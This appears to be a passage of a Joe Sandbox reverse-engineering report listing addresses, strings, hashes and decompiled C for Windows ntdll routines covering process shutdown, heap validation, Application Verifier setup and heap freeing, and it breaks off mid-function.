0x34ebf0e7
0x34ebf0ec
0x34ebf0ec
0x34e7d71c
0x34e7d71f
0x34e7d724
0x34e7d732
0x34e7d86d
0x34e7d873
0x34e7d875
0x34e7d877
0x34e7d879
0x34e7d87f
0x34e7d87f
0x34e7d738
0x34e7d740
0x34e7d742
0x34e7d744
0x34e7d744
0x34e7d750
0x34ebf0f4
0x34ebf0f7
0x34ebf0fe
0x34ebf101
0x34ebf108
0x34ebf10b
0x34ebf10d
0x00000000
0x00000000
0x34ebf113
0x34ebf117
0x34e7d7ed
0x34e7d7ed
0x34e7d7f3
0x34e7d7fa
0x34ebf13c
0x34ebf13f
0x34ebf145
0x34ebf14a
0x34ebf14a
0x34ebf13f
0x34e7d800
0x34e7d804
0x34e7d806
0x34e7d806
0x34e7d80b
0x00000000
0x34e7d80b
0x34e7d756
0x34e7d756
0x34e7d75a
0x34e7d75d
0x34e7d766
0x34e7d76c
0x34e7d76e
0x34e7d76e
0x34e7d771
0x34e7d774
0x34e7d774
0x34e7d777
0x34e7d77a
0x34e7d77a
0x34e7d77d
0x34e7d782
0x34e7d78d
0x34e7d794
0x34e7d799
0x34e7d79f
0x34e7d79f
0x34e7d7a1
0x34e7d7a7
0x34e7d7ac
0x34e7d7af
0x34e7d7b2
0x34e7d7b6
0x34e7d7da
0x34e7d7da
0x34e7d7b8
0x34e7d7b9
0x34e7d7c0
0x34e7d7c5
0x34e7d7cc
0x34e7d7cf
0x34e7d7cf
0x00000000
0x34e7d782
0x34e7d7e1
0x34e7d7e7
0x34e7d7eb
0x34e7d820
0x34e7d827
0x34e7d82c
0x34e7d832
0x34e7d834
0x34e7d83a
0x34e7d83f
0x34e7d842
0x34e7d84a
0x34e7d84f
0x34e7d856
0x34e7d856
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 34E7D879

Part of subcall function 34E54779: RtlDebugPrintTimes.NTDLL ref: 34E54817

Strings

minkernel\ntdll\ldrinit.c, xrefs: 34EBF0E2
$, xrefs: 34E7D820
$, xrefs: 34E7D78D
Process 0x%p (%wZ) exiting, xrefs: 34EBF0D1
LdrShutdownProcess, xrefs: 34EBF0D8

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-1975516107
Opcode ID: d7195f830d72961f82882d02c4cd7dbac9bb4431cb4a2d053a5c4d69f4abda8f
Instruction ID: 8685810f8b51c717789701a1b07f1489c18212e23e4420ec3045e0702d6f7fba
Opcode Fuzzy Hash: d7195f830d72961f82882d02c4cd7dbac9bb4431cb4a2d053a5c4d69f4abda8f
Instruction Fuzzy Hash: EE51BB75A08349DFEB04CFE4C584B9DBFB1FF54328F688059D501AB281DB79A986CB80

Uniqueness

Uniqueness Score: -1.00%

Function 34EFF51B Relevance: 10.2, Strings: 8, Instructions: 189COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 34EFF55F, 34EFF5A4, 34EFF5F0, 34EFF655, 34EFF6A3, 34EFF6EA
HEAP[%wZ]: , xrefs: 34EFF552, 34EFF597, 34EFF5E3, 34EFF648, 34EFF696, 34EFF6DD
Specified HeapBase (%p) invalid, Status = %lx, xrefs: 34EFF664
May not specify Lock parameter with HEAP_NO_SERIALIZE, xrefs: 34EFF5FB
Specified HeapBase (%p) != to BaseAddress (%p), xrefs: 34EFF6B2
Invalid CommitSize parameter - %Ix, xrefs: 34EFF5B2
Specified HeapBase (%p) is free or not writable, xrefs: 34EFF6F8
Invalid ReserveSize parameter - %Ix, xrefs: 34EFF56B

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
API String ID: 0-2224505338
Opcode ID: 5985021b123b5c8400235216c37295b79971f5fc8d1fed92357861e44dbc398f
Instruction ID: 6c95dbc4ce1de9382170ce5b30589f39e907475ab4a6d4e41f5b7d9be529b8fa
Opcode Fuzzy Hash: 5985021b123b5c8400235216c37295b79971f5fc8d1fed92357861e44dbc398f
Instruction Fuzzy Hash: 5F513936621244EFE705DFA4ED84E15B3B4EF08664F16889AF5009B392CA32E940CF54

Uniqueness

Uniqueness Score: -1.00%

Function 34ED8633 Relevance: 9.0, Strings: 7, Instructions: 259
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E34ED8633(char __ecx, intOrPtr __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				intOrPtr _v0;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				char _v28;
				char _v29;
				signed int _v30;
				char _v31;
				intOrPtr _v32;
				signed int _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t50;
				signed int _t51;
				signed int _t52;
				intOrPtr _t69;
				signed int _t76;
				signed int _t88;
				intOrPtr _t92;
				signed int _t97;
				signed int _t103;
				signed int _t121;
				intOrPtr* _t124;
				intOrPtr _t126;
				signed int _t127;
				signed int _t128;
				intOrPtr* _t130;

				_t115 = __edx;
				_t103 = __ecx;
				_t97 = 0;
				_v8 = __edx;
				_v31 = __ecx;
				_t126 =  *[fs:0x30];
				_v12 = _t126;
				_v24 = 0;
				_v28 = 0;
				_t50 = _a8;
				if(_t50 == 0) {
					_t121 = _a16;
					__eflags = _t121;
					if(_t121 != 0) {
						 *_t121 = 0;
						__eflags =  *(_t126 + 0x68) & 0x02000100;
						if(( *(_t126 + 0x68) & 0x02000100) == 0) {
							_t51 = E34ED36EC();
							_t103 = _v31;
							__eflags = _t51;
							if(_t51 != 0) {
								_v28 = 2;
							}
						} else {
							_v28 = 1;
						}
						__eflags =  *(_t126 + 0x68) & 0x00000100;
						if(( *(_t126 + 0x68) & 0x00000100) != 0) {
							L35:
							_t52 = 0x48004;
							goto L36;
						} else {
							__eflags = _t103;
							if(_t103 != 0) {
								goto L35;
							}
							_t52 = 0;
							L36:
							_t127 = _a4;
							 *0x34f45a74 = _t52;
							 *0x34f45000 = 0;
							__eflags = _t127;
							if(_t127 == 0) {
								L40:
								__eflags = _v31;
								if(_v31 != 0) {
									 *0x34f45238 = 1;
								}
								L42:
								__eflags = _t127;
								if(__eflags != 0) {
									__eflags = _t52 & 0x00000004;
									if((_t52 & 0x00000004) != 0) {
										E34E46CC0(_t127, L"HandleTraces", 4, 0x34f469d8, 4, 0);
									}
									E34E46CC0(_t127, L"VerifierDebug", 4, 0x34f469dc, 4, 0);
									E34E46CC0(_t127, L"VerifierDlls", 1, 0x34f45000, 0x200, 0);
								}
								_t116 = _v8;
								_t128 = E34ED98B2(0x34e21b98, _v8, __eflags, _t127, _a12, 0x34f45260);
								__eflags = _t128;
								if(_t128 >= 0) {
									 *_t121 = 0x34f45260;
									_t128 = E34ED8FBB();
									__eflags = _t128;
									if(_t128 >= 0) {
										E34E81D66(0x34e21b98, _t116, 0);
										 *0x34f49234 = _v32;
										E34E81D66(0x34e21b98, _t116, 1);
									}
								}
								L49:
								return _t128;
							}
							E34E46CC0(_t127, L"VerifierFlags", 4,  &_v24, 4, 0);
							_t52 = _v48;
							__eflags = _t52;
							if(_t52 == 0) {
								_t52 =  *0x34f45a74; // 0x0
								goto L40;
							}
							 *0x34f45a74 = _t52;
							goto L42;
						}
					}
					_t128 = 0xc000000d;
					goto L49;
				}
				if(_t50 != 1) {
					L25:
					_t128 = _t97;
					goto L49;
				}
				 *0x34f45244 = 0x34f45240;
				 *0x34f45240 = 0x34f45240;
				_t128 = L34E7FBC0(0x34f45220, 0, 0);
				if(_t128 < 0) {
					goto L49;
				}
				if( *0x34f49234 == 2) {
					_v29 = 0;
					_t128 = E34E71934(0x34f45308, 0,  &_v29);
					__eflags = _t128;
					if(_t128 < 0) {
						goto L49;
					}
					goto L25;
				}
				_push( *0x34f45a74);
				_push( *((intOrPtr*)( *[fs:0x18] + 0x20)));
				_t69 =  *0x34f45d8c; // 0x4c12ce0
				_t8 = _t69 + 0x30; // 0x4c11d08
				E34EDEF10(0x5d, 0, "AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled\n",  *_t8);
				if(E34ED9429(_t115) >= 0) {
					_t130 =  *0x34f45240; // 0x0
					while(1) {
						__eflags = _t130 - 0x34f45240;
						if(__eflags == 0) {
							break;
						}
						_t71 = E34ED919C(_t97, _t130, 0x34f45240, _t130, __eflags);
						__eflags = _t71;
						if(_t71 == 0) {
							_t128 = 0xc0000142;
							goto L49;
						} else {
							_t130 =  *_t130;
							continue;
						}
					}
					L34ED8B5E(_t71);
					_t108 = 0x34e21b88;
					_t128 = E34E6F380(0x34e21b88, 0, _t97,  &_v20, _t97);
					__eflags = _t128;
					if(_t128 < 0) {
						__eflags = _t128 - 0xc0000135;
						if(_t128 != 0xc0000135) {
							goto L49;
						}
						_t131 =  *0x34f45278; // 0x0
						L15:
						_t76 = E34E6CF00(_t108, 0, _t131, 0x34e21b90, 0,  &_v16, 1, _v0);
						E34E81D66(_t108, 0, 0);
						__eflags = _t76;
						if(_t76 >= 0) {
							_t88 =  *0x7ffe0330;
							_t108 = _t88 & 0x0000001f;
							__eflags = _t88 & 0x0000001f;
							asm("ror eax, cl");
							 *0x34f49238 = _t88 ^ _v16;
							 *0x34f49230 = 1;
						}
						 *0x34f49231 = 1;
						 *0x34f49232 = 1;
						E34ED964A(E34E81D66(_t108, 0, 1));
						_t124 =  *0x34f45240; // 0x0
						_t97 = 0;
						__eflags = 0;
						while(1) {
							__eflags = _t124 - 0x34f45240;
							if(_t124 == 0x34f45240) {
								break;
							}
							_v30 = _t97;
							_t128 = E34E71934( *((intOrPtr*)( *((intOrPtr*)(_t124 + 0x10)) + 0x50)), 0,  &_v30);
							__eflags = _t128;
							if(_t128 < 0) {
								goto L49;
							}
							_t124 =  *_t124;
						}
						__eflags =  *0x34f469dc & 0x00000008;
						if(( *0x34f469dc & 0x00000008) != 0) {
							_push("AVRF: -*- final list of providers -*- \n");
							E34ED8EB8(E34E4B910());
						}
						E34ED9818();
						E34E5E580(3,  *((intOrPtr*)(_v12 + 8)), _t97, _t97,  &_v28);
						goto L25;
					}
					_t108 = _v20;
					_t131 =  *((intOrPtr*)(_v20 + 0x18));
					E34E6D3E1(_t97, _v20,  *((intOrPtr*)(_v20 + 0x18)));
					goto L15;
				} else {
					_push( *((intOrPtr*)( *[fs:0x18] + 0x20)));
					_t92 =  *0x34f45d8c; // 0x4c12ce0
					_t10 = _t92 + 0x30; // 0x4c11d08
					E34EDEF10(0x5d, 0, "AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.\n",  *_t10);
					_t128 = 0xc0000001;
					 *( *[fs:0x30] + 0x68) =  *( *[fs:0x30] + 0x68) & 0xfffffeff;
					goto L49;
				}
			}

0x34ed8633
0x34ed8633
0x34ed8642
0x34ed8644
0x34ed8648
0x34ed864d
0x34ed8654
0x34ed8658
0x34ed865c
0x34ed8661
0x34ed8663
0x34ed8861
0x34ed8864
0x34ed8866
0x34ed8872
0x34ed8877
0x34ed887e
0x34ed8886
0x34ed888b
0x34ed888f
0x34ed8891
0x34ed8893
0x34ed8893
0x34ed8880
0x34ed8880
0x34ed8880
0x34ed889b
0x34ed88a2
0x34ed88ac
0x34ed88ac
0x00000000
0x34ed88a4
0x34ed88a4
0x34ed88a6
0x00000000
0x00000000
0x34ed88a8
0x34ed88b1
0x34ed88b1
0x34ed88b6
0x34ed88bb
0x34ed88c2
0x34ed88c4
0x34ed88ef
0x34ed88ef
0x34ed88f4
0x34ed88f6
0x34ed88f6
0x34ed88fc
0x34ed88fc
0x34ed88fe
0x34ed8900
0x34ed8902
0x34ed8915
0x34ed8915
0x34ed892b
0x34ed8943
0x34ed8943
0x34ed8948
0x34ed895f
0x34ed8961
0x34ed8963
0x34ed8965
0x34ed8970
0x34ed8972
0x34ed8974
0x34ed8978
0x34ed8982
0x34ed8987
0x34ed8987
0x34ed8974
0x34ed898c
0x34ed8994
0x34ed8994
0x34ed88d6
0x34ed88db
0x34ed88df
0x34ed88e1
0x34ed88ea
0x00000000
0x34ed88ea
0x34ed88e3
0x00000000
0x34ed88e3
0x34ed88a2
0x34ed8868
0x00000000
0x34ed8868
0x34ed866c
0x34ed885a
0x34ed885a
0x00000000
0x34ed885a
0x34ed867e
0x34ed8684
0x34ed868f
0x34ed8693
0x00000000
0x00000000
0x34ed86a0
0x34ed883f
0x34ed8850
0x34ed8852
0x34ed8854
0x00000000
0x00000000
0x00000000
0x34ed8854
0x34ed86a6
0x34ed86b2
0x34ed86b5
0x34ed86ba
0x34ed86c5
0x34ed86d4
0x34ed8719
0x34ed872e
0x34ed872e
0x34ed8730
0x00000000
0x00000000
0x34ed8723
0x34ed8728
0x34ed872a
0x34ed875e
0x00000000
0x34ed872c
0x34ed872c
0x00000000
0x34ed872c
0x34ed872a
0x34ed8732
0x34ed8740
0x34ed874a
0x34ed874c
0x34ed874e
0x34ed8768
0x34ed876e
0x00000000
0x00000000
0x34ed8774
0x34ed877a
0x34ed878e
0x34ed8797
0x34ed879c
0x34ed879e
0x34ed87a0
0x34ed87ab
0x34ed87ab
0x34ed87ae
0x34ed87b0
0x34ed87b5
0x34ed87b5
0x34ed87bc
0x34ed87c2
0x34ed87cd
0x34ed87d2
0x34ed87d8
0x34ed87d8
0x34ed87da
0x34ed87da
0x34ed87e0
0x00000000
0x00000000
0x34ed87ec
0x34ed87f8
0x34ed87fa
0x34ed87fc
0x00000000
0x00000000
0x34ed8802
0x34ed8802
0x34ed8806
0x34ed880d
0x34ed880f
0x34ed881a
0x34ed881a
0x34ed881f
0x34ed8834
0x00000000
0x34ed8834
0x34ed8750
0x34ed8754
0x34ed8757
0x00000000
0x34ed86d6
0x34ed86dc
0x34ed86df
0x34ed86e4
0x34ed86ef
0x34ed86fd
0x34ed8711
0x00000000
0x34ed8711

Strings

AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 34ED86E7
VerifierDebug, xrefs: 34ED8925
AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 34ED86BD
VerifierDlls, xrefs: 34ED893D
HandleTraces, xrefs: 34ED890F
AVRF: -*- final list of providers -*- , xrefs: 34ED880F
VerifierFlags, xrefs: 34ED88D0

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: ddf11a33d99843aed81c920e724c0f1c8325e6dda1270d2a9595925c0b50ec33
Instruction ID: fbf1b94eb57e45d382533193eb44c7e5a58800080aefa92ea13191822d5812bc
Opcode Fuzzy Hash: ddf11a33d99843aed81c920e724c0f1c8325e6dda1270d2a9595925c0b50ec33
Instruction Fuzzy Hash: 7D910476A05711EFE311DF649880B2AB7A8FF42758F490469F9546B3A0CB30D907CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 34E4F113 Relevance: 8.2, Strings: 6, Instructions: 684
COMMONCrypto

Download Yara Rule

C-Code - Quality: 65%

			E34E4F113(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				void* _v56;
				intOrPtr _v60;
				void* _v68;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t242;
				signed char _t243;
				signed short _t245;
				signed int _t247;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				intOrPtr _t255;
				signed int _t265;
				signed int _t274;
				signed int _t277;
				intOrPtr _t278;
				signed int _t279;
				signed int _t302;
				signed short _t308;
				intOrPtr _t312;
				signed int _t323;
				signed int _t328;
				signed int _t331;
				intOrPtr _t332;
				signed int _t334;
				signed int _t336;
				signed int _t337;
				signed int _t340;
				intOrPtr _t341;
				intOrPtr _t350;
				signed int _t354;
				signed int _t357;
				intOrPtr _t358;
				signed int _t359;
				signed int _t378;
				signed short _t386;
				intOrPtr _t388;
				intOrPtr _t399;
				unsigned int _t415;
				signed int _t424;
				signed int _t427;
				signed int _t431;
				signed int _t439;
				signed short _t440;
				signed short _t443;
				signed int _t447;
				signed short* _t453;
				void* _t461;
				signed int _t472;
				signed int _t473;
				signed int _t475;
				intOrPtr _t476;
				signed int _t483;
				void* _t485;
				signed short _t496;
				unsigned int _t502;
				unsigned int _t504;
				signed int _t509;
				signed int _t514;
				signed short* _t524;
				signed int _t535;
				signed int _t537;
				signed int _t540;
				unsigned int _t545;
				signed int _t547;

				_t444 = __ecx;
				_t547 = __ecx;
				_t533 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0x34f46d48) != 0) {
					_push(_a4);
					_t509 = __edx;
					L11:
					_t242 = L34E60B10(_t444, _t509);
					L7:
					return _t242;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x240)) =  *((intOrPtr*)(__ecx + 0x240)) - 1;
						_t424 = E34E4F858(__edx,  &_v12,  &_v16);
						__eflags = _t424;
						if(_t424 != 0) {
							_t135 = _t547 + 0x244;
							 *_t135 =  *(_t547 + 0x244) - _v16;
							__eflags =  *_t135;
						}
					}
					_t439 = _a4;
					_t509 = _t533;
					_v44 = _t533;
					L14:
					_t243 =  *((intOrPtr*)(_t533 + 6));
					__eflags = _t243;
					if(_t243 == 0) {
						_t535 = _t547;
					} else {
						_t535 = (_t533 & 0xffff0000) - ((_t243 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t535;
					}
					_t245 = 7 + _t439 * 8 + _t509;
					_v12 = _t245;
					__eflags =  *_t245 - 3;
					if( *_t245 == 3) {
						_v16 = _t509 + _t439 * 8 + 8;
						E34E49E69(_t547, _t509 + _t439 * 8 + 8);
						_t496 = _v16;
						_v28 =  *(_t496 + 0x10);
						 *((intOrPtr*)(_t535 + 0x30)) =  *((intOrPtr*)(_t535 + 0x30)) - 1;
						_v36 =  *(_t496 + 0x14);
						 *((intOrPtr*)(_t535 + 0x2c)) =  *((intOrPtr*)(_t535 + 0x2c)) - ( *(_t496 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t547 + 0x1f8)) =  *((intOrPtr*)(_t547 + 0x1f8)) +  *(_t496 + 0x14);
						 *((intOrPtr*)(_t547 + 0x208)) =  *((intOrPtr*)(_t547 + 0x208)) - 1;
						_t415 =  *(_t496 + 0x14);
						__eflags = _t415 - 0x7f000;
						if(_t415 >= 0x7f000) {
							 *(_t547 + 0x1fc) =  *(_t547 + 0x1fc) - _t415;
							_t415 =  *(_t496 + 0x14);
						}
						_t509 = _v44;
						_t439 = _t439 + (_t415 >> 3) + 0x20;
						__eflags = 1;
						_a4 = _t439;
						_v40 = 1;
					} else {
						_v36 = _v36 & 0x00000000;
					}
					__eflags =  *((intOrPtr*)(_t547 + 0x54)) -  *((intOrPtr*)(_t509 + 4));
					if( *((intOrPtr*)(_t547 + 0x54)) ==  *((intOrPtr*)(_t509 + 4))) {
						_v48 = _t509;
						_t247 = E34E4BF92(_t535, _t509);
						__eflags = _a8;
						_v32 = _t247;
						if(_a8 != 0) {
							__eflags = _t247;
							if(_t247 == 0) {
								goto L20;
							}
						}
						__eflags =  *0x34f46960 - 1;
						if( *0x34f46960 >= 1) {
							__eflags = _t247;
							if(_t247 == 0) {
								_t399 =  *[fs:0x30];
								__eflags =  *(_t399 + 0xc);
								if( *(_t399 + 0xc) == 0) {
									_push("HEAP: ");
									E34E4B910();
								} else {
									E34E4B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E34E4B910();
								__eflags =  *0x34f45da8;
								if( *0x34f45da8 == 0) {
									__eflags = 0;
									E34F0FC95(_t439, 1, _t535, 0);
								}
								_t509 = _v44;
								_t439 = _a4;
							}
						}
						_t334 = _v40;
						_t472 = _t439 << 3;
						_v20 = _t472;
						_t473 = _t472 + _t509;
						_v24 = _t473;
						__eflags = _t334;
						if(_t334 == 0) {
							_t473 = _t473 + 0xfffffff0;
						}
						_t475 = (_t473 & 0xfffff000) - _v48;
						__eflags = _t475;
						_v52 = _t475;
						if(_t475 == 0) {
							__eflags =  *0x34f46960 - 1;
							if( *0x34f46960 < 1) {
								goto L9;
							}
							__eflags = _t334;
							L147:
							if(__eflags == 0) {
								goto L9;
							}
							_t255 =  *[fs:0x30];
							__eflags =  *(_t255 + 0xc);
							if( *(_t255 + 0xc) == 0) {
								_push("HEAP: ");
								E34E4B910();
							} else {
								E34E4B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							E34E4B910();
							__eflags =  *0x34f45da8;
							if( *0x34f45da8 == 0) {
								__eflags = 0;
								E34F0FC95(_t439, 1, _t535, 0);
							}
							goto L153;
						} else {
							_t336 = E34E4FABA( &_v48,  &_v52, 0x4000);
							__eflags = _t336;
							if(_t336 < 0) {
								L90:
								 *((intOrPtr*)(_t547 + 0x220)) =  *((intOrPtr*)(_t547 + 0x220)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									L154:
									_t509 = _v44;
									L9:
									_t444 = _t547;
									L10:
									_push(_t439);
									goto L11;
								}
								E34E6096B(_t547, _t535, _v28 + 0xffffffe8, _v36, _v44,  &_a4);
								L153:
								_t439 = _a4;
								goto L154;
							}
							_t337 = E34E63C40();
							_t441 = 0x7ffe0380;
							__eflags = _t337;
							if(_t337 != 0) {
								_t340 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t340 = 0x7ffe0380;
							}
							__eflags =  *_t340;
							if( *_t340 != 0) {
								_t341 =  *[fs:0x30];
								__eflags =  *(_t341 + 0x240) & 0x00000001;
								if(( *(_t341 + 0x240) & 0x00000001) != 0) {
									E34F0F13E(_t441, _t547, _v48, _v52, 5);
								}
							}
							_t342 = _v32;
							 *((intOrPtr*)(_t547 + 0x210)) =  *((intOrPtr*)(_t547 + 0x210)) + 1;
							_t476 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t476 - 0x7f000;
							if(_t476 >= 0x7f000) {
								 *(_t547 + 0x1fc) =  *(_t547 + 0x1fc) - _t476;
							}
							E34E49E69(_t547, _t342);
							_t478 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							E34E4B9F6(_t547, _t478);
							 *((intOrPtr*)(_t535 + 0x2c)) =  *((intOrPtr*)(_t535 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t547 + 0x1f8)) =  *((intOrPtr*)(_t547 + 0x1f8)) - _v52;
							_t350 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t350 - 0x7f000;
							if(_t350 >= 0x7f000) {
								_t123 = _t547 + 0x1fc;
								 *_t123 =  *(_t547 + 0x1fc) + _t350;
								__eflags =  *_t123;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t524 = _v52 + _v48;
								_v32 = _t524;
								_t524[2] =  *((intOrPtr*)(_t547 + 0x54));
								__eflags = _v24 - _v52 + _v48;
								if(_v24 == _v52 + _v48) {
									__eflags =  *(_t547 + 0x4c);
									if( *(_t547 + 0x4c) != 0) {
										_t524[1] = _t524[1] ^ _t524[0] ^  *_t524;
										 *_t524 =  *_t524 ^  *(_t547 + 0x50);
									}
								} else {
									_t443 = 0;
									_t524[3] = 0;
									_t524[1] = 0;
									_t378 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t483 = _t378;
									 *_t524 = _t378;
									__eflags =  *0x34f46960 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t483 - 1;
										if(_t483 <= 1) {
											_t388 =  *[fs:0x30];
											__eflags =  *(_t388 + 0xc);
											if( *(_t388 + 0xc) == 0) {
												_push("HEAP: ");
												E34E4B910();
											} else {
												E34E4B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											E34E4B910();
											__eflags =  *0x34f45da8 - _t443; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												E34F0FC95(_t443, 1, _t535, 0);
											}
											_t524 = _v32;
										}
									}
									_t524[1] = _t443;
									__eflags =  *((intOrPtr*)(_t535 + 0x18)) - _t535;
									if( *((intOrPtr*)(_t535 + 0x18)) != _t535) {
										_t386 = (_t524 - _t535 >> 0x10) + 1;
										_v16 = _t386;
										__eflags = _t386 - 0xfe;
										if(_t386 >= 0xfe) {
											_push(_t443);
											_push(_t443);
											_push(_t535);
											_push(_t524);
											_t485 = 3;
											E34F15FED(_t485,  *((intOrPtr*)(_t535 + 0x18)));
											_t524 = _v48;
											_t386 = _v32;
										}
										_t443 = _t386;
									}
									_t524[3] = _t443;
									L34E60B10(_t547, _t524,  *_t524 & 0x0000ffff);
									_t441 = 0x7ffe0380;
								}
							}
							_t354 = E34E63C40();
							__eflags = _t354;
							if(_t354 != 0) {
								_t357 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t357 = _t441;
							}
							__eflags =  *_t357;
							if( *_t357 != 0) {
								_t358 =  *[fs:0x30];
								__eflags =  *(_t358 + 0x240) & 1;
								if(( *(_t358 + 0x240) & 1) != 0) {
									__eflags = E34E63C40();
									if(__eflags != 0) {
										_t441 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E34F0F058(_t441, _t547, _v48, __eflags, _v52,  *(_t547 + 0x74) << 3, _v40, _v36,  *_t441 & 0x000000ff);
								}
							}
							_t359 = E34E63C40();
							_t540 = 0x7ffe038a;
							_t440 = 0x230;
							__eflags = _t359;
							if(_t359 != 0) {
								_t242 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t242 = 0x7ffe038a;
							}
							__eflags =  *_t242;
							if( *_t242 != 0) {
								__eflags = E34E63C40();
								if(__eflags != 0) {
									_t540 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t440;
									__eflags = _t540;
								}
								_push( *_t540 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								L123:
								_push( *(_t547 + 0x74) << 3);
								_push(_v52);
								_t242 = E34F0F058(_t440, _t547, _v48, __eflags);
							}
							goto L7;
						}
					}
					L20:
					_t447 = _t509 + 0x0000101f & 0xfffff000;
					_v48 = _t447;
					__eflags = _t447 - _t509 + 0x28;
					if(_t447 == _t509 + 0x28) {
						_t447 = _t447 + 0x1000;
						_v48 = _t447;
					}
					_t250 = _t439 << 3;
					_v24 = _t250;
					_t251 = _t250 + _t509;
					__eflags = _v40;
					_v20 = _t251;
					if(_v40 == 0) {
						_t251 = _t251 + 0xfffffff0;
					}
					_t252 = _t251 & 0xfffff000;
					__eflags = _t252 - _t447;
					if(_t252 < _t447) {
						__eflags =  *0x34f46960 - 1; // 0x0
						if(__eflags < 0) {
							goto L9;
						}
						__eflags = _v40;
						goto L147;
					}
					_t265 = _t252 - _t447;
					__eflags = _a8;
					_v52 = _t265;
					if(_a8 != 0) {
						L25:
						__eflags = _t265;
						if(_t265 == 0) {
							L31:
							_t440 = 0;
							__eflags = _v40;
							if(_v40 == 0) {
								_t453 = _v48 + _v52;
								_v36 = _t453;
								_t453[2] =  *((intOrPtr*)(_t547 + 0x54));
								__eflags = _v20 - _v52 + _v48;
								if(_v20 == _v52 + _v48) {
									__eflags =  *(_t547 + 0x4c);
									if( *(_t547 + 0x4c) != 0) {
										_t453[1] = _t453[1] ^ _t453[0] ^  *_t453;
										 *_t453 =  *_t453 ^  *(_t547 + 0x50);
									}
								} else {
									_t453[3] = 0;
									_t453[1] = 0;
